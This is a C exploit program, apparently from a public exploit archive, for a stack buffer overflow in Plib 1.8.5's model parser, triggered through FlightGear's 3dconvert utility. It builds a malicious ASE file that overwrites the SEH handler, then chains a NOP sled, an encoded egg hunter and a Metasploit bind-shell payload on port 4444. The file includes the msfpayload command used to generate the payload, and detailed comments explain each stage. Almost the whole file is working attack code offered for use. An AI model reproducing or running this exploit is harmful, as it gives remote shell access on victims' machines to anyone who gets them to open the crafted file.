/*
# Exploit Title: Plib + flightgear 3dconvert exploit
# Date: 08/10/2012
# Author: Andres Gomez
# Software Links:
# Plib: http://plib.sourceforge.net/
# flightgear: http://www.flightgear.org/
# 3dconvert: ftp://ftp.ihg.uni-duisburg.de/FlightGear/Win32/old/3dconvert-win32.zip
# Version: Plib 1.8.5
# Tested on: Windows XP Service Pack 3 Spanish
*/
/*
Plib is prone to a stack-based buffer overflow in the error() function in ssg/ssgParser.cxx, reached when it
loads 3D model files such as X (DirectX), ASC, ASE, ATG and OFF.
This exploit uses FlightGear's 3dconvert utility. The program below writes a malformed ASE file, "test.ase", into the current directory; to trigger the overflow, run:
FlightGear\bin\Win32\3dconvert.exe test.ase test.obj
*/
#include <stdio.h>
#include <stdlib.h>
/*
Shellcode: msfpayload windows/shell_bind_tcp LPORT=4444 R | ./msfencode -e x86/alpha_mixed C
*/
/*
 * Stage 2: windows/shell_bind_tcp on port 4444, encoded with x86/alpha_mixed
 * (command above). Apart from the short decoder prologue every byte is in the
 * printable ASCII range and there is no 0x00 anywhere, which is what allows
 * main() to emit it with fprintf("%s") -- a payload containing a NUL would be
 * silently truncated there.
 */
unsigned char shellcode[] =
"\x89\xe0\xdd\xc6\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x69\x6c\x5a\x48\x4f\x79\x33\x30\x75\x50"
"\x67\x70\x71\x70\x4b\x39\x78\x65\x45\x61\x4a\x72\x71\x74"
"\x6c\x4b\x76\x32\x44\x70\x4e\x6b\x73\x62\x46\x6c\x6e\x6b"
"\x36\x32\x66\x74\x4c\x4b\x50\x72\x47\x58\x36\x6f\x4c\x77"
"\x50\x4a\x54\x66\x35\x61\x79\x6f\x45\x61\x4b\x70\x6e\x4c"
"\x47\x4c\x31\x71\x33\x4c\x35\x52\x56\x4c\x31\x30\x6a\x61"
"\x58\x4f\x34\x4d\x45\x51\x79\x57\x4d\x32\x6c\x30\x32\x72"
"\x61\x47\x4e\x6b\x66\x32\x44\x50\x4e\x6b\x47\x32\x37\x4c"
"\x55\x51\x6e\x30\x6e\x6b\x61\x50\x32\x58\x6e\x65\x79\x50"
"\x34\x34\x73\x7a\x46\x61\x5a\x70\x46\x30\x6e\x6b\x72\x68"
"\x66\x78\x6c\x4b\x63\x68\x55\x70\x66\x61\x78\x53\x49\x73"
"\x75\x6c\x77\x39\x6c\x4b\x64\x74\x6c\x4b\x57\x71\x7a\x76"
"\x45\x61\x39\x6f\x76\x51\x6b\x70\x4e\x4c\x5a\x61\x68\x4f"
"\x64\x4d\x66\x61\x4a\x67\x45\x68\x39\x70\x70\x75\x5a\x54"
"\x43\x33\x51\x6d\x58\x78\x45\x6b\x71\x6d\x47\x54\x54\x35"
"\x7a\x42\x53\x68\x4e\x6b\x66\x38\x44\x64\x53\x31\x4e\x33"
"\x43\x56\x4c\x4b\x56\x6c\x32\x6b\x4e\x6b\x36\x38\x77\x6c"
"\x37\x71\x4a\x73\x6e\x6b\x66\x64\x4c\x4b\x46\x61\x78\x50"
"\x4c\x49\x50\x44\x36\x44\x71\x34\x63\x6b\x53\x6b\x33\x51"
"\x46\x39\x70\x5a\x70\x51\x49\x6f\x49\x70\x32\x78\x61\x4f"
"\x70\x5a\x6c\x4b\x67\x62\x6a\x4b\x4d\x56\x43\x6d\x52\x48"
"\x67\x43\x46\x52\x47\x70\x43\x30\x65\x38\x50\x77\x54\x33"
"\x45\x62\x31\x4f\x71\x44\x65\x38\x62\x6c\x53\x47\x34\x66"
"\x53\x37\x39\x6f\x7a\x75\x6d\x68\x4a\x30\x35\x51\x53\x30"
"\x45\x50\x76\x49\x78\x44\x46\x34\x56\x30\x72\x48\x56\x49"
"\x4b\x30\x62\x4b\x43\x30\x39\x6f\x48\x55\x42\x70\x50\x50"
"\x76\x30\x52\x70\x73\x70\x70\x50\x51\x50\x62\x70\x75\x38"
"\x39\x7a\x36\x6f\x6b\x6f\x39\x70\x69\x6f\x48\x55\x6e\x69"
"\x58\x47\x35\x61\x79\x4b\x66\x33\x30\x68\x56\x62\x73\x30"
"\x37\x61\x63\x6c\x6c\x49\x6a\x46\x62\x6a\x64\x50\x73\x66"
"\x72\x77\x51\x78\x6a\x62\x49\x4b\x46\x57\x42\x47\x4b\x4f"
"\x39\x45\x73\x63\x61\x47\x35\x38\x58\x37\x69\x79\x30\x38"
"\x59\x6f\x69\x6f\x4a\x75\x61\x43\x31\x43\x53\x67\x30\x68"
"\x62\x54\x68\x6c\x65\x6b\x69\x71\x59\x6f\x68\x55\x56\x37"
"\x4d\x59\x7a\x67\x53\x58\x71\x65\x72\x4e\x42\x6d\x45\x31"
"\x6b\x4f\x68\x55\x43\x58\x53\x53\x42\x4d\x35\x34\x77\x70"
"\x4c\x49\x69\x73\x42\x77\x42\x77\x70\x57\x46\x51\x49\x66"
"\x30\x6a\x64\x52\x56\x39\x66\x36\x68\x62\x69\x6d\x75\x36"
"\x78\x47\x67\x34\x61\x34\x57\x4c\x67\x71\x47\x71\x4e\x6d"
"\x63\x74\x54\x64\x36\x70\x48\x46\x53\x30\x42\x64\x72\x74"
"\x46\x30\x46\x36\x76\x36\x42\x76\x53\x76\x63\x66\x42\x6e"
"\x72\x76\x53\x66\x56\x33\x62\x76\x51\x78\x42\x59\x68\x4c"
"\x75\x6f\x6b\x36\x49\x6f\x48\x55\x4d\x59\x4b\x50\x32\x6e"
"\x36\x36\x61\x56\x49\x6f\x76\x50\x53\x58\x43\x38\x6f\x77"
"\x57\x6d\x35\x30\x6b\x4f\x4b\x65\x6d\x6b\x58\x70\x78\x35"
"\x4e\x42\x72\x76\x63\x58\x6f\x56\x4c\x55\x6d\x6d\x6d\x4d"
"\x6b\x4f\x39\x45\x55\x6c\x37\x76\x61\x6c\x45\x5a\x4b\x30"
"\x6b\x4b\x69\x70\x54\x35\x77\x75\x4f\x4b\x77\x37\x52\x33"
"\x52\x52\x32\x4f\x51\x7a\x77\x70\x30\x53\x59\x6f\x6a\x75"
"\x41\x41";
/*
 * Stage 1: egg hunter, encoded with the same alpha_mixed scheme (the decoder
 * prologue matches the one above). It is the code the SEH chain lands on;
 * presumably it scans the process memory for the egg tag below and transfers
 * control to whatever follows the tag -- the bind shell in this file.
 * Like shellcode[], it contains no 0x00 byte.
 */
unsigned char egg_hunter [] =
"\xdb\xd9\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x43\x56\x4e\x61\x6a\x6a\x4b\x4f\x54\x4f\x51"
"\x52\x76\x32\x42\x4a\x33\x73\x51\x48\x68\x4d\x56\x4e\x75"
"\x6c\x66\x65\x30\x5a\x71\x64\x78\x6f\x4e\x58\x5a\x30\x52"
"\x70\x6a\x30\x30\x50\x6c\x4b\x79\x6a\x6e\x4f\x34\x35\x7a"
"\x4a\x4c\x6f\x62\x55\x6d\x37\x49\x6f\x6a\x47\x41\x41";
/* Egg tag: the 2-byte marker 0x90 0x50 repeated four times; main() writes it
 * immediately before shellcode[], so a hunter that matches the tag continues
 * straight into the bind shell. The tag must match what egg_hunter[] was
 * generated with -- change one and the other has to be regenerated. */
unsigned char egg [] = "\x90\x50\x90\x50\x90\x50\x90\x50";
/* SEH handler overwrite: 0x08E11949 little-endian, a pop/pop/ret gadget per the
 * original author. The module the gadget lives in is not recorded in this file;
 * the address is only known to work for the tested 3dconvert build on
 * Windows XP SP3 Spanish (see header) and must be re-found for any other
 * target or build. */
unsigned char seh_pointer [] = "\x49\x19\xE1\x08"; // seh pointer pop pop ret;
/* Next-SEH overwrite: EB 0C is "jmp short +12" relative to the following
 * instruction, i.e. it skips the two 0x41 pad bytes and the 4-byte handler
 * address and lands inside the 15-byte NOP sled main() writes right after
 * seh_pointer, which runs into egg_hunter[]. The trailing 0x41 0x41 only pad
 * the slot to 4 bytes. */
unsigned char short_jump [] = "\xEB\x0C\x41\x41"; // short jump;
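/*
 * Emit `count` copies of `byte` to `fd`.
 * Returns 0 on success, -1 on the first write error.
 */
static int write_fill(FILE *fd, int byte, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        if (fputc(byte, fd) == EOF) {
            return -1;
        }
    }
    return 0;
}

/*
 * Binary-safe replacement for fprintf(fd, "%s", payload): %s stops at the
 * first NUL byte, so a payload containing 0x00 would be silently truncated
 * and the resulting file would crash the target without running the shell.
 * Returns 0 when all `len` bytes were written, -1 otherwise.
 */
static int write_raw(FILE *fd, const unsigned char *buf, size_t len)
{
    return fwrite(buf, 1, len, fd) == len ? 0 : -1;
}

/*
 * Entry point: writes the crafted ASE file "test.ase" into the current
 * directory. Returns 0 on success, -1 if the file cannot be created or
 * not every byte could be written (partial files are reported, not hidden).
 *
 * Layout of the overlong *SUBMATERIAL token, in file order:
 *   573 x 'A'    filler up to the SEH record of the vulnerable frame
 *   short_jump   next-SEH slot: jmp short over the handler into the NOPs
 *   seh_pointer  handler slot: hard-coded pop/pop/ret gadget address
 *   15 x 0x90    NOP sled, landing zone of the short jump
 *   egg_hunter   locates the egg tag in memory and jumps to it
 *   573 x 'A'    filler
 *   egg          tag the hunter searches for
 *   shellcode    bind shell, port 4444
 *   " {\n"       trailing text that closes the token for the parser
 *
 * The file is deliberately opened in text mode: the header is written with
 * "\n" line ends and on Windows (the tested target) the runtime turns them
 * into CRLF exactly as the original did. None of the raw payload arrays
 * contain 0x0A, so the translation cannot corrupt them. If a payload is ever
 * swapped for one that contains 0x0A, open the file with "wb" and write the
 * header line ends explicitly instead.
 */
int main(int argc, char **argv) {
    static const char ase_header[] =
        "*3DSMAX_ASCIIEXPORT 200\n"
        "*COMMENT \"created by SSG.\"\n"
        "*SCENE {\n"
        " *SCENE_FILENAME \"\"\n"
        " *SCENE_FIRSTFRAME 0\n"
        " *SCENE_LASTFRAME 100\n"
        " *SCENE_FRAMESPEED 30\n"
        " *SCENE_TICKSPERFRAME 160\n"
        " *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000\n"
        " *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431\n"
        "}\n"
        "*MATERIAL_LIST {\n"
        " *MATERIAL_COUNT 2\n"
        " *MATERIAL 0 {\n"
        " *MATERIAL_NAME \"Material #0\"\n"
        " *MATERIAL_CLASS \"Standard\"\n"
        " *MATERIAL_AMBIENT 1.000000 1.000000 1.000000\n"
        " *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000\n"
        " *MATERIAL_SPECULAR 0.502000 0.502000 0.502000\n"
        " *MATERIAL_SHINE 50.000000\n"
        " *MATERIAL_SHINESTRENGTH 50.000000\n"
        " *MATERIAL_TRANSPARENCY 0.000000\n"
        " *MATERIAL_WIRESIZE 1.0000\n"
        " *MATERIAL_SHADING Blinn\n"
        " *MATERIAL_XP_FALLOFF 0.0000\n"
        " *MATERIAL_SELFILLUM 0.0000\n"
        " *MATERIAL_TWOSIDED\n"
        " *MATERIAL_FALLOFF In\n"
        " *MATERIAL_SOFTEN\n"
        " *MATERIAL_XP_TYPE Filter\n"
        " *SUBMATERIAL ";
    const char *path = "test.ase";
    FILE *save_fd;
    int rc = -1;

    (void)argc;
    (void)argv;

    /* "w" is enough: the original's "w+" read permission was never used. */
    save_fd = fopen(path, "w");
    if (save_fd == NULL) {
        printf("Failed to open '%s' for writing", path);
        return -1;
    }

    if (fputs(ase_header, save_fd) == EOF) goto done;
    /* sizeof x - 1 drops the NUL terminator the string literals carry. */
    if (write_fill(save_fd, 'A', 573) != 0) goto done;
    if (write_raw(save_fd, short_jump, sizeof short_jump - 1) != 0) goto done;
    if (write_raw(save_fd, seh_pointer, sizeof seh_pointer - 1) != 0) goto done;
    if (write_fill(save_fd, 0x90, 15) != 0) goto done;
    if (write_raw(save_fd, egg_hunter, sizeof egg_hunter - 1) != 0) goto done;
    if (write_fill(save_fd, 'A', 573) != 0) goto done;
    if (write_raw(save_fd, egg, sizeof egg - 1) != 0) goto done;
    if (write_raw(save_fd, shellcode, sizeof shellcode - 1) != 0) goto done;
    if (fputs(" {\n", save_fd) == EOF) goto done;
    rc = 0;

done:
    /*
     * fclose(), not close(): the original called the POSIX fd close() on a
     * FILE* (undeclared, wrong argument type) and never flushed the stdio
     * buffer itself, relying on exit() to do it. fclose() flushes and reports
     * a failed final write.
     */
    if (fclose(save_fd) != 0) {
        rc = -1;
    }
    if (rc != 0) {
        printf("Failed to write '%s' completely", path);
    }
    return rc;
}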